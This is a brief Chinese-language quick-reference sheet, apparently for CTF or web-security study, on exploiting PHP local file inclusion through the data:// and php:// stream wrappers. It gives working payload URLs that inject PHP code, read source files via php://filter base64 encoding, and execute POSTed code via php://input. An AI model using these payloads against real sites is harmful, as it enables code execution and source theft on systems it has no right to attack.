一键速查

我也不知道我从哪薅来这张表 总之总结的很好就对了.jpg

data://

条件：双 on

用法：

data://text/plain,

data://text/plain;base64,(后面跟的代码是经过base64之后的）

a.php?filename=data://text/plain,<?php phpinfo();?>
a.php?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

php://

条件：

php://filter 无

php://input allow_url_include：on

php://filter：在我们需要包含脚本文件，避免脚本被执行，想到拿到源代码的时候使用。

a.php?filename=php://filter/read=convert.base64-encode/resource=a.php

php://input：把post数据当做php代码执行，注意：enctype="multipart/form-data"的时候这个伪协议没用：

a.php?filename=php://input
POST数据:<?php phpinfo();?>